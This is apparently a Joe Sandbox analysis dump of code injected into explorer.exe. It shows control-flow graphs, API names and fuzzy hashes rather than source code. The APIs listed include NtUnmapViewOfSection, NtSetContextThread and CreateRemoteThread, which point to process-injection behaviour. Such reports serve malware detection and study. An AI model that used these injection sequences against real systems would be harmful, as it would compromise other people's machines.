4dc0e88 2 API calls 15523->15524 15525 4dc59be 15524->15525 15526 4dcf2ac 2 API calls 15525->15526 15529 4dc59f8 15525->15529 15527 4dc59e3 15526->15527 15527->15529 15531 4db8560 2 API calls 15527->15531 15528 4dc5c97 15529->15528 15530 4dcf704 4 API calls 15529->15530 15530->15528 15531->15529 14842 4da5020 14845 4da5034 14842->14845 14843 4da517b RegGetValueW 14844 4da51b6 14843->14844 14845->14843 14845->14844 15349 4db0420 15352 4dcd8d0 15349->15352 15351 4db046a 15353 4dcd967 15352->15353 15354 4dcd932 15352->15354 15353->15351 15354->15353 15355 4da9f98 5 API calls 15354->15355 15355->15354 15532 4dbefa0 15534 4dbf009 15532->15534 15535 4dbf02f 15532->15535 15533 4dbb520 5 API calls 15533->15534 15534->15533 15534->15535 14860 4db33a4 14865 4db33f1 14860->14865 14861 4db3415 ConnectNamedPipe 14861->14865 14862 4db3532 DisconnectNamedPipe 14862->14865 14863 4db3555 14864 4dc5470 4 API calls 14864->14865 14865->14861 14865->14862 14865->14863 14865->14864 14866 4dcf2ac 2 API calls 14865->14866 14867 4dafd84 ReadFile FindCloseChangeNotification 14865->14867 14866->14865 14867->14865 15536 4dbbba4 15537 4dbbbe4 15536->15537 15538 4da85e8 CreateFileA 15537->15538 15543 4dbbbfb 15537->15543 15539 4dbbc21 15538->15539 15540 4dcf2ac 2 API calls 15539->15540 15539->15543 15541 4dbbc48 15540->15541 15542 4db8560 2 API calls 15541->15542 15541->15543 15542->15543

                                                                                                                                                      Executed Functions

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 4dcafb8-4dcb02b call 4db64f8 3 4dcb16b-4dcb171 0->3 4 4dcb031-4dcb062 0->4 7 4dcb173-4dcb17a 3->7 8 4dcb068-4dcb09d call 4dbf0c4 4->8 9 4dcb15b-4dcb169 4->9 10 4dcba59-4dcba5c 7->10 11 4dcb180-4dcb1ad 7->11 20 4dcb143-4dcb149 8->20 21 4dcb0a3-4dcb0bb call 4dbf0c4 8->21 9->7 14 4dcba5e-4dcba5f 10->14 15 4dcba67-4dcba6a 10->15 11->10 22 4dcb1b3-4dcb1ce call 4dbf0c4 11->22 14->15 18 4dcba6c-4dcba6d 15->18 19 4dcba75-4dcba78 15->19 18->19 24 4dcba7a-4dcba7b 19->24 25 4dcba83-4dcba8b 19->25 34 4dcb14b-4dcb159 20->34 21->20 35 4dcb0c1-4dcb0d5 call 4db64f8 21->35 22->10 38 4dcb1d4-4dcb1db 22->38 24->25 26 4dcba8d-4dcba8e 25->26 27 4dcba96-4dcba99 25->27 26->27 31 4dcba9b-4dcba9c 27->31 32 4dcbaa4-4dcbaa7 27->32 31->32 36 4dcbaa9-4dcbaaa 32->36 37 4dcbab2-4dcbab5 32->37 34->7 35->20 46 4dcb0d7-4dcb0ef call 4dbf0c4 35->46 36->37 41 4dcbab7-4dcbab8 37->41 42 4dcbac0-4dcbad0 37->42 43 4dcb261-4dcb26f 38->43 44 4dcb1e1-4dcb1f7 38->44 41->42 47 4dcb275-4dcb292 43->47 48 4dcb352-4dcb37f 43->48 49 4dcb1f9-4dcb20e 44->49 50 4dcb252 call 4dbd0f0 44->50 46->20 63 4dcb0f1-4dcb126 call 4dbf0c4 46->63 59 4dcb298-4dcb2b1 47->59 60 4dcb34b-4dcb34c 47->60 48->10 64 4dcb385-4dcb38f 48->64 61 4dcb25a-4dcb25b 49->61 62 4dcb210-4dcb231 call 4db71bc 49->62 57 4dcb257-4dcb258 50->57 57->61 59->60 75 4dcb2b7-4dcb2cf 59->75 60->48 61->43 76 4dcb23c-4dcb250 62->76 77 4dcb233-4dcb23a 62->77 63->20 80 4dcb128-4dcb141 call 4db64f8 63->80 67 4dcb51a-4dcb532 64->67 68 4dcb395-4dcb3ac call 4dbf0c4 64->68 78 4dcba3e-4dcba49 67->78 79 4dcb538-4dcb553 call 4dca864 67->79 68->10 81 4dcb3b2-4dcb3be 68->81 84 4dcb2d1-4dcb2df 75->84 85 4dcb2f3-4dcb317 75->85 76->61 77->61 77->76 82 4dcba4b-4dcba4c 78->82 83 4dcba54-4dcba55 78->83 79->78 96 4dcb559-4dcb55a 79->96 80->20 80->34 88 4dcb3fc-4dcb402 81->88 89 4dcb3c0-4dcb3ef call 4dcf04c call 4dca7cc 81->89 82->83 83->10 84->85 90 4dcb2e1-4dcb2f1 84->90 92 4dcb31f-4dcb343 85->92 97 4dcb408-4dcb412 88->97 98 4dcb515 call 4db9cb0 88->98 107 4dcb3f4-4dcb3f6 89->107 90->92 92->60 101 4dcb55e 96->101 102 4dcb418-4dcb419 97->102 103 4dcb4fa-4dcb50d 97->103 98->67 105 4dcb561-4dcb583 101->105 106 4dcb41f-4dcb432 102->106 103->98 108 4dcb58f-4dcb59f 105->108 109 4dcb585-4dcb58a 105->109 116 4dcb43b-4dcb466 106->116 117 4dcb434-4dcb438 106->117 107->88 110 4dcb68e-4dcb6a0 108->110 111 4dcb5a5-4dcb5c9 RegOpenKeyA 108->111 112 4dcb6a3-4dcb6df RegNotifyChangeKeyValue 109->112 110->112 114 4dcb5cf-4dcb609 111->114 115 4dcb688 111->115 112->78 121 4dcb6e5-4dcb6e7 112->121 123 4dcb67d-4dcb67e 114->123 124 4dcb60b-4dcb623 114->124 115->110 128 4dcb468-4dcb47f 116->128 129 4dcb487-4dcb4d6 call 4db17a0 call 4da5474 116->129 117->116 121->78 122 4dcb6ed-4dcb6f7 call 4dcacac 121->122 122->105 131 4dcb6fd-4dcb70f 122->131 123->115 124->123 132 4dcb625-4dcb656 124->132 128->129 129->106 163 4dcb4dc-4dcb4f4 129->163 136 4dcb845-4dcb857 131->136 137 4dcb715-4dcb724 131->137 139 4dcb658-4dcb669 call 4db17a0 132->139 140 4dcb66b-4dcb675 132->140 148 4dcb85d-4dcb872 136->148 149 4dcb8fe-4dcb910 136->149 137->78 146 4dcb72a-4dcb732 137->146 139->140 140->123 150 4dcb738-4dcb792 SetWaitableTimer 146->150 151 4dcba12-4dcba34 146->151 148->78 158 4dcb878-4dcb87d 148->158 159 4dcb981-4dcb98e 149->159 160 4dcb912-4dcb92a 149->160 165 4dcb794-4dcb7d3 call 4dc98dc 150->165 166 4dcb7d5 150->166 151->78 162 4dcba36-4dcba38 151->162 158->149 164 4dcb87f-4dcb88c 158->164 177 4dcb9bb-4dcb9c3 call 4dcacac 159->177 178 4dcb990-4dcb9b6 call 4da94f0 call 4da1e24 159->178 160->78 179 4dcb930-4dcb935 160->179 162->78 167 4dcb83c-4dcb83d 162->167 163->103 168 4dcb88e 164->168 169 4dcb894-4dcb8b9 SetWaitableTimer 164->169 172 4dcb7da-4dcb7dc 165->172 166->172 167->136 168->169 183 4dcb8c5-4dcb8d7 call 4dac134 169->183 174 4dcb9c8-4dcb9ca 172->174 175 4dcb7e2-4dcb813 call 4dc17c8 172->175 186 4dcb837-4dcb838 174->186 187 4dcb9d0-4dcba0d SetWaitableTimer 174->187 175->174 196 4dcb819-4dcb821 175->196 177->101 178->177 179->159 184 4dcb937-4dcb97c call 4dcfd8c call 4da7e24 179->184 200 4dcb8ed-4dcb8f7 183->200 201 4dcb8d9-4dcb8e8 call 4da94f0 183->201 184->159 186->167 187->186 196->186 199 4dcb823-4dcb832 call 4da94f0 196->199 199->186 200->149 205 4dcb8f9 call 4dcfd8c 200->205 201->200 205->149
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateMutex
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 1964310414-2766056989
                                                                                                                                                      • Opcode ID: 5314d47ac38499b3761c766e81e2f58df1e2a23380e3b59c62fbc0fb59a0bd70
                                                                                                                                                      • Instruction ID: 06c24c4f7564942d0a7e28f7f913ece2d173ee042fc541141c1cf40f98b4d262
                                                                                                                                                      • Opcode Fuzzy Hash: 5314d47ac38499b3761c766e81e2f58df1e2a23380e3b59c62fbc0fb59a0bd70
                                                                                                                                                      • Instruction Fuzzy Hash: B3526530718B498FEB64DF24E8997AA77E2FB98305F44852ED48AC3260DF78E545CB41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 210 4dbf770-4dbf83c call 4da26aa call 4dcd630 RegisterClassA 218 4dbf8fc-4dbf902 210->218 219 4dbf842-4dbf885 CreateWindowExA 210->219 222 4dbf904-4dbf979 218->222 219->218 223 4dbf887-4dbf88c 219->223 228 4dbfa18-4dbfa2a 222->228 229 4dbf97f-4dbf99c 222->229 224 4dbf88e-4dbf8a6 223->224 225 4dbf8dc-4dbf8fa 223->225 231 4dbf8a8-4dbf8ab 224->231 232 4dbf8d4-4dbf8da 224->232 225->222 233 4dbfb71-4dbfb80 228->233 234 4dbfa30-4dbfa31 228->234 235 4dbf99e-4dbf9ab 229->235 231->232 237 4dbf8ad-4dbf8d0 231->237 232->225 239 4dbfbec-4dbfbfc 233->239 240 4dbfb82-4dbfb98 233->240 238 4dbfa34-4dbfa38 234->238 241 4dbf9ad-4dbf9b5 235->241 242 4dbf9b7-4dbf9ba 235->242 237->224 276 4dbf8d2 237->276 244 4dbfa3e-4dbfa47 238->244 245 4dbfb63-4dbfb66 238->245 255 4dbfbff-4dbfc1c 239->255 246 4dbfbe6-4dbfbea 240->246 241->241 241->242 247 4dbf9df-4dbf9e2 242->247 248 4dbf9bc-4dbf9bf 242->248 257 4dbfa49-4dbfa4f 244->257 258 4dbfa55-4dbfa68 244->258 245->255 256 4dbfb6c-4dbfb6d 245->256 246->239 252 4dbfb9a-4dbfbad 246->252 249 4dbfa15-4dbfa16 247->249 250 4dbf9e4-4dbf9e7 247->250 248->250 259 4dbf9c1-4dbf9c8 248->259 249->228 260 4dbf9e9-4dbf9ec 250->260 261 4dbfa02-4dbfa0d 250->261 262 4dbfbaf-4dbfbb1 252->262 263 4dbfbdd-4dbfbe4 252->263 256->233 257->258 264 4dbfb4e-4dbfb55 257->264 265 4dbfa6a-4dbfa6b 258->265 266 4dbfa83-4dbfab4 258->266 259->250 267 4dbf9ca-4dbf9dd 259->267 260->261 268 4dbf9ee-4dbf9f5 260->268 261->255 269 4dbfa13 261->269 262->263 272 4dbfbb3-4dbfbb7 262->272 263->246 264->238 270 4dbfb5b 264->270 273 4dbfa6d-4dbfa81 265->273 280 4dbfaba-4dbfac0 266->280 281 4dbfb5d-4dbfb5e 266->281 267->250 268->261 275 4dbf9f7-4dbfa00 268->275 269->235 270->245 277 4dbfbb9-4dbfbc5 272->277 273->266 273->273 275->261 276->225 278 4dbfbc7-4dbfbd1 277->278 279 4dbfbd4-4dbfbdb 277->279 278->279 279->263 279->277 280->264 282 4dbfac6-4dbfac7 280->282 281->245 283 4dbfac9-4dbfad4 282->283 284 4dbfadd-4dbfae0 283->284 285 4dbfad6-4dbfadb 283->285 287 4dbfaf2-4dbfaf3 284->287 288 4dbfae2-4dbfaeb 284->288 286 4dbfaf6-4dbfaf9 285->286 290 4dbfafb-4dbfb03 286->290 291 4dbfb22-4dbfb38 286->291 287->286 288->287 289 4dbfaed-4dbfaf0 288->289 289->286 292 4dbfb0e-4dbfb1e 290->292 293 4dbfb05-4dbfb0c 290->293 295 4dbfb3a-4dbfb44 291->295 296 4dbfb48-4dbfb49 291->296 292->291 293->292 293->293 295->283 297 4dbfb46 295->297 296->264 297->264
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassCreateRegisterWindow
                                                                                                                                                      • String ID: rGet$rLoa$~
                                                                                                                                                      • API String ID: 3469048531-56615508
                                                                                                                                                      • Opcode ID: 378cad44ec98ef4833cc9a3360bd655300b258c4a04a6e08fc69adcab72a772a
                                                                                                                                                      • Instruction ID: 940de7e47d25e6fc1455f127b4016d98f9a4fbc97b242dc362c349ecf22c4456
                                                                                                                                                      • Opcode Fuzzy Hash: 378cad44ec98ef4833cc9a3360bd655300b258c4a04a6e08fc69adcab72a772a
                                                                                                                                                      • Instruction Fuzzy Hash: A6E1B330618B09CFD728DF28DC956A6B7E1FB99314F14862ED4CBC3255EB34E5468B82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 298 4dc676c-4dc67c8 299 4dc67df-4dc67e7 298->299 300 4dc67ca-4dc67dd 298->300 301 4dc67ec-4dc67f4 299->301 300->301 302 4dc67fe-4dc6803 301->302 303 4dc67f6-4dc67f9 301->303 305 4dc6848-4dc6852 302->305 306 4dc6805-4dc6822 302->306 304 4dc6dfe-4dc6e1a 303->304 307 4dc6d7e 305->307 308 4dc6858-4dc6868 305->308 314 4dc682c-4dc6846 call 4da6450 306->314 315 4dc6824-4dc6827 306->315 311 4dc6d83-4dc6d86 307->311 308->307 309 4dc686e-4dc6878 308->309 312 4dc687e-4dc6882 309->312 313 4dc6aa5-4dc6aa8 309->313 316 4dc6d88-4dc6d92 NtUnmapViewOfSection 311->316 317 4dc6d97-4dc6d9a 311->317 320 4dc6aae-4dc6ab3 312->320 321 4dc6888-4dc68c3 call 4db387c 312->321 313->320 313->321 314->305 322 4dc6dd5-4dc6ddd 315->322 316->317 318 4dc6d9c-4dc6da7 317->318 319 4dc6dd0-4dc6dd1 317->319 324 4dc6da9-4dc6dab 318->324 325 4dc6db2-4dc6db9 NtClose 318->325 319->322 320->322 333 4dc68c9-4dc68ff call 4dbffcc 321->333 334 4dc6d77-4dc6d7c 321->334 322->304 327 4dc6ddf-4dc6df6 call 4da26aa 322->327 324->325 329 4dc6dad-4dc6db0 324->329 332 4dc6dbe-4dc6dc8 325->332 327->304 329->319 332->319 333->311 338 4dc6905-4dc6919 call 4dc1158 333->338 334->311 338->311 341 4dc691f-4dc6922 338->341 342 4dc6924-4dc692e call 4da94d2 341->342 343 4dc6933-4dc6938 341->343 342->343 344 4dc693a-4dc6940 343->344 345 4dc6963-4dc6989 call 4da94d2 343->345 344->345 347 4dc6942-4dc6943 344->347 351 4dc699c-4dc69a0 345->351 352 4dc698b-4dc6999 345->352 349 4dc6946-4dc6961 347->349 349->345 349->349 353 4dc69b9-4dc69c6 351->353 354 4dc69a2-4dc69b6 351->354 352->351 355 4dc69cc-4dc69f6 353->355 356 4dc6ab8-4dc6abf 353->356 354->353 357 4dc6a0e-4dc6a31 call 4db17b8 355->357 358 4dc69f8-4dc69ff 355->358 359 4dc6ad7-4dc6afc 356->359 360 4dc6ac1-4dc6ac8 356->360 368 4dc6b88-4dc6b8a 357->368 369 4dc6a37-4dc6a5e call 4db17b8 357->369 358->357 361 4dc6a01-4dc6a08 358->361 359->368 370 4dc6b02-4dc6b26 call 4dbe8c8 359->370 360->359 362 4dc6aca-4dc6ad1 360->362 361->357 366 4dc6a93-4dc6aa0 361->366 362->359 367 4dc6b76-4dc6b7a 362->367 371 4dc6b80-4dc6b83 call 4da94d2 366->371 367->371 368->311 375 4dc6b90-4dc6bd4 call 4da94d2 368->375 369->368 380 4dc6a64-4dc6a8b call 4db17b8 369->380 370->368 381 4dc6b28-4dc6b4c call 4dbe8c8 370->381 371->368 387 4dc6d5c-4dc6d5e 375->387 388 4dc6bda-4dc6c1f call 4da26aa * 2 375->388 380->368 389 4dc6a91 380->389 381->368 390 4dc6b4e-4dc6b72 call 4dbe8c8 381->390 387->311 393 4dc6d60-4dc6d6b 387->393 400 4dc6d2b-4dc6d32 388->400 401 4dc6c25-4dc6c52 call 4dabab4 388->401 389->366 390->368 398 4dc6b74 390->398 393->311 396 4dc6d6d-4dc6d75 393->396 396->311 398->367 405 4dc6d3b 400->405 406 4dc6d34-4dc6d39 400->406 407 4dc6c58-4dc6c65 401->407 408 4dc6d42-4dc6d48 401->408 410 4dc6d3d-4dc6d40 405->410 409 4dc6d4a-4dc6d54 406->409 411 4dc6c7d-4dc6c7f 407->411 412 4dc6c67-4dc6c7b 407->412 408->409 409->387 410->408 410->409 411->410 413 4dc6c85-4dc6cda call 4da94d2 411->413 412->411 419 4dc6cdc-4dc6ce1 413->419 420 4dc6ce4-4dc6d02 call 4db3830 413->420 419->420 420->409 423 4dc6d04-4dc6d11 420->423 423->410 424 4dc6d13-4dc6d1f NtSetContextThread 423->424 425 4dc6d27-4dc6d29 424->425 425->410
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                                      • Opcode ID: ee1595ae80a92ada7dedeeacb340e960b6c6dcc775881cad41c6e6d46d7a8d37
                                                                                                                                                      • Instruction ID: f5a12e4d95e63561b6b91f582d5a2b3ce75014945918d00b5422be5fb415274f
                                                                                                                                                      • Opcode Fuzzy Hash: ee1595ae80a92ada7dedeeacb340e960b6c6dcc775881cad41c6e6d46d7a8d37
                                                                                                                                                      • Instruction Fuzzy Hash: E4127430718F0A8FEB59EF68D894AA673E1FB98301F44462ED44AC3255EF34F9458B85
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 483 4dc0034-4dc0095 RegOpenKeyA 484 4dc009b-4dc00be RegQueryValueA 483->484 485 4dc0193-4dc0196 483->485 488 4dc00c4-4dc00dc 484->488 489 4dc0183 484->489 486 4dc019c-4dc01bd 485->486 487 4dc03ed-4dc03ee 485->487 495 4dc03f7-4dc03fd 486->495 498 4dc01c3-4dc01fc 486->498 491 4dc03f2-4dc03f5 487->491 488->489 499 4dc00e2-4dc00ff RegQueryValueA 488->499 490 4dc0188-4dc018d RegCloseKey 489->490 490->485 494 4dc0404-4dc0407 491->494 491->495 496 4dc0418-4dc0420 494->496 497 4dc0409-4dc0414 494->497 505 4dc03ff-4dc0400 495->505 500 4dc0428-4dc0430 496->500 501 4dc0422-4dc0423 496->501 497->496 498->495 510 4dc0202-4dc0207 498->510 502 4dc016f-4dc0181 499->502 503 4dc0101-4dc0110 499->503 506 4dc0438-4dc0440 500->506 507 4dc0432-4dc0433 500->507 501->500 502->490 516 4dc0167-4dc016d 503->516 517 4dc0112-4dc0125 503->517 505->494 511 4dc044d-4dc0455 506->511 512 4dc0442-4dc0448 506->512 507->506 514 4dc0209-4dc020e 510->514 515 4dc0213-4dc022b 510->515 518 4dc045d-4dc0465 511->518 519 4dc0457-4dc0458 511->519 512->511 514->505 515->495 527 4dc0231-4dc0246 515->527 516->502 528 4dc0127-4dc013c 517->528 529 4dc0152 517->529 520 4dc046d-4dc0478 518->520 521 4dc0467-4dc0468 518->521 519->518 522 4dc047a-4dc047b 520->522 523 4dc0483-4dc0498 520->523 521->520 522->523 527->495 534 4dc024c-4dc0269 527->534 535 4dc013e-4dc0146 528->535 536 4dc0148-4dc0150 528->536 530 4dc0157-4dc015a 529->530 530->502 533 4dc015c-4dc0165 530->533 533->502 534->495 540 4dc026f-4dc0283 534->540 535->502 536->530 540->495 541 4dc0289-4dc028a 540->541 542 4dc028c-4dc0294 541->542 543 4dc03bc-4dc03e5 542->543 544 4dc029a-4dc029b 542->544 543->542 549 4dc03eb 543->549 545 4dc02a2-4dc02b1 544->545 547 4dc0306-4dc0332 545->547 548 4dc02b3-4dc02b6 545->548 551 4dc039e-4dc03ab 547->551 556 4dc0334-4dc0396 call 4dae750 547->556 550 4dc02bc-4dc0301 548->550 548->551 549->491 550->551 551->545 553 4dc03b1-4dc03ba 551->553 553->543 556->551
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: QueryValue$CloseOpen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1586453840-0
                                                                                                                                                      • Opcode ID: 0410a4167a375566f8ba12f17147ce5c8607138fe5ce19b47042865aa484ad92
                                                                                                                                                      • Instruction ID: 276d0085424b2a4df6f0fb2cb54a1c4b8984531edbaca336311d386d4c184528
                                                                                                                                                      • Opcode Fuzzy Hash: 0410a4167a375566f8ba12f17147ce5c8607138fe5ce19b47042865aa484ad92
                                                                                                                                                      • Instruction Fuzzy Hash: 9CD1A83521CA49CFCB59EF68D885A6AB3E1FB98300F15456DE49BC3261DF34E845CB82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 566 4da37b8-4da37fe 568 4da3bdc-4da3be8 566->568 569 4da3804-4da3853 call 4db6b64 566->569 574 4da3874-4da3892 569->574 575 4da3855-4da3870 569->575 577 4da3898-4da38d1 call 4da26aa FindFirstFileW 574->577 578 4da3bb1-4da3bb9 574->578 575->574 584 4da3a73-4da3a9b FindFirstFileW 577->584 585 4da38d7-4da38df 577->585 579 4da3bca-4da3bd4 578->579 580 4da3bbb-4da3bc2 578->580 579->568 580->579 590 4da3b9a-4da3b9d 584->590 591 4da3aa1-4da3aa2 584->591 586 4da38e1-4da38e5 585->586 588 4da3a2b-4da3a39 586->588 589 4da38eb-4da38f2 586->589 599 4da3a3b-4da3a4f 588->599 600 4da3a55-4da3a6c 588->600 589->588 592 4da38f8-4da38fd 589->592 590->578 596 4da3b9f-4da3ba9 590->596 593 4da3aa5-4da3aa9 591->593 592->588 594 4da3903-4da394b 592->594 597 4da3b5f-4da3b6f FindNextFileW 593->597 598 4da3aaf-4da3ab2 593->598 615 4da3951-4da3993 call 4da26aa 594->615 616 4da3a26-4da3a27 594->616 596->578 601 4da3b8f-4da3b94 FindClose 597->601 602 4da3b71-4da3b89 597->602 598->597 603 4da3ab8-4da3acd 598->603 599->586 599->600 600->584 601->590 602->593 602->601 610 4da3acf-4da3ae6 603->610 611 4da3b10-4da3b5b call 4da37b8 603->611 618 4da3aea-4da3af3 610->618 611->597 626 4da39be-4da39bf 615->626 627 4da3995-4da39bc 615->627 616->588 618->618 622 4da3af5-4da3b0e 618->622 622->601 622->611 628 4da39c2-4da39ee 626->628 627->628 632 4da39fe-4da3a1b 628->632 633 4da39f0-4da39f7 628->633 634 4da3a1d 632->634 635 4da3a23 632->635 633->632 634->635 635->616
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$First$CloseNext
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2001080981-0
                                                                                                                                                      • Opcode ID: 38711eba31781e4de2b32a3d4a8a3a54250a23ca74fa31da85b9ea8fcf3ad2ab
                                                                                                                                                      • Instruction ID: 25e8338dc4526b9c4f1caa2b3c7ad29763deb1b19f7713a58fd96c98b837cfa4
                                                                                                                                                      • Opcode Fuzzy Hash: 38711eba31781e4de2b32a3d4a8a3a54250a23ca74fa31da85b9ea8fcf3ad2ab
                                                                                                                                                      • Instruction Fuzzy Hash: 6BC14D71618B498FDBA4EF28D88876A77F6FB98301F504539E84EC3265DB34E845CB42
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 682 4dbf560-4dbf598 683 4dbf59a-4dbf5ad 682->683 684 4dbf5bc-4dbf5c6 682->684 683->684 690 4dbf5af-4dbf5b7 683->690 685 4dbf5c8-4dbf5eb 684->685 686 4dbf5f2-4dbf602 684->686 695 4dbf5ed-4dbf5ee 685->695 696 4dbf646-4dbf64b 685->696 688 4dbf65f-4dbf67c 686->688 689 4dbf604-4dbf632 NtSetInformationProcess 686->689 702 4dbf67e-4dbf680 688->702 692 4dbf650-4dbf658 689->692 693 4dbf634-4dbf644 call 4dc5fc4 689->693 704 4dbf753-4dbf76d 690->704 703 4dbf65a-4dbf65d 692->703 693->703 695->686 699 4dbf743-4dbf746 696->699 699->704 706 4dbf748-4dbf749 699->706 702->699 705 4dbf686-4dbf6a5 702->705 703->688 703->702 708 4dbf6ab-4dbf6ae 705->708 709 4dbf73e 705->709 706->704 708->709 710 4dbf6b4-4dbf6e4 CreateRemoteThread 708->710 709->699 711 4dbf6e6-4dbf6ed 710->711 712 4dbf734-4dbf73c 710->712 713 4dbf6f9-4dbf715 call 4da27e8 711->713 714 4dbf6ef-4dbf6f4 call 4da936c 711->714 712->699 719 4dbf721 ResumeThread 713->719 720 4dbf717-4dbf71f 713->720 714->713 721 4dbf727-4dbf732 FindCloseChangeNotification 719->721 720->721 721->699
                                                                                                                                                      APIs
                                                                                                                                                      • NtSetInformationProcess.NTDLL ref: 04DBF62A
                                                                                                                                                      • CreateRemoteThread.KERNEL32 ref: 04DBF6DA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateInformationProcessRemoteThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3020566308-0
                                                                                                                                                      • Opcode ID: 2a60409d33bb50b087945fb9e8025c27173b54c3f3ba081195cfe01e6e59568e
                                                                                                                                                      • Instruction ID: ea5a9cd0fb4985854a18096821d11432fd81735934507730a5649cc586691732
                                                                                                                                                      • Opcode Fuzzy Hash: 2a60409d33bb50b087945fb9e8025c27173b54c3f3ba081195cfe01e6e59568e
                                                                                                                                                      • Instruction Fuzzy Hash: 4451823061CB058FE758EF68D8996A677E1FB99301F00846DE98BC3261EA74E9458B81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 761 4dcb516-4dcb532 763 4dcba3e-4dcba49 761->763 764 4dcb538-4dcb553 call 4dca864 761->764 765 4dcba4b-4dcba4c 763->765 766 4dcba54-4dcba5c 763->766 764->763 772 4dcb559-4dcb55a 764->772 765->766 770 4dcba5e-4dcba5f 766->770 771 4dcba67-4dcba6a 766->771 770->771 774 4dcba6c-4dcba6d 771->774 775 4dcba75-4dcba78 771->775 773 4dcb55e 772->773 776 4dcb561-4dcb583 773->776 774->775 777 4dcba7a-4dcba7b 775->777 778 4dcba83-4dcba8b 775->778 781 4dcb58f-4dcb59f 776->781 782 4dcb585-4dcb58a 776->782 777->778 779 4dcba8d-4dcba8e 778->779 780 4dcba96-4dcba99 778->780 779->780 785 4dcba9b-4dcba9c 780->785 786 4dcbaa4-4dcbaa7 780->786 783 4dcb68e-4dcb6a0 781->783 784 4dcb5a5-4dcb5c9 RegOpenKeyA 781->784 787 4dcb6a3-4dcb6df RegNotifyChangeKeyValue 782->787 783->787 788 4dcb5cf-4dcb609 784->788 789 4dcb688 784->789 785->786 790 4dcbaa9-4dcbaaa 786->790 791 4dcbab2-4dcbab5 786->791 787->763 796 4dcb6e5-4dcb6e7 787->796 798 4dcb67d-4dcb67e 788->798 799 4dcb60b-4dcb623 788->799 789->783 790->791 792 4dcbab7-4dcbab8 791->792 793 4dcbac0-4dcbad0 791->793 792->793 796->763 797 4dcb6ed-4dcb6f7 call 4dcacac 796->797 797->776 804 4dcb6fd-4dcb70f 797->804 798->789 799->798 805 4dcb625-4dcb656 799->805 808 4dcb845-4dcb857 804->808 809 4dcb715-4dcb724 804->809 810 4dcb658-4dcb669 call 4db17a0 805->810 811 4dcb66b-4dcb675 805->811 817 4dcb85d-4dcb872 808->817 818 4dcb8fe-4dcb910 808->818 809->763 816 4dcb72a-4dcb732 809->816 810->811 811->798 819 4dcb738-4dcb792 SetWaitableTimer 816->819 820 4dcba12-4dcba34 816->820 817->763 824 4dcb878-4dcb87d 817->824 825 4dcb981-4dcb98e 818->825 826 4dcb912-4dcb92a 818->826 830 4dcb794-4dcb7d3 call 4dc98dc 819->830 831 4dcb7d5 819->831 820->763 828 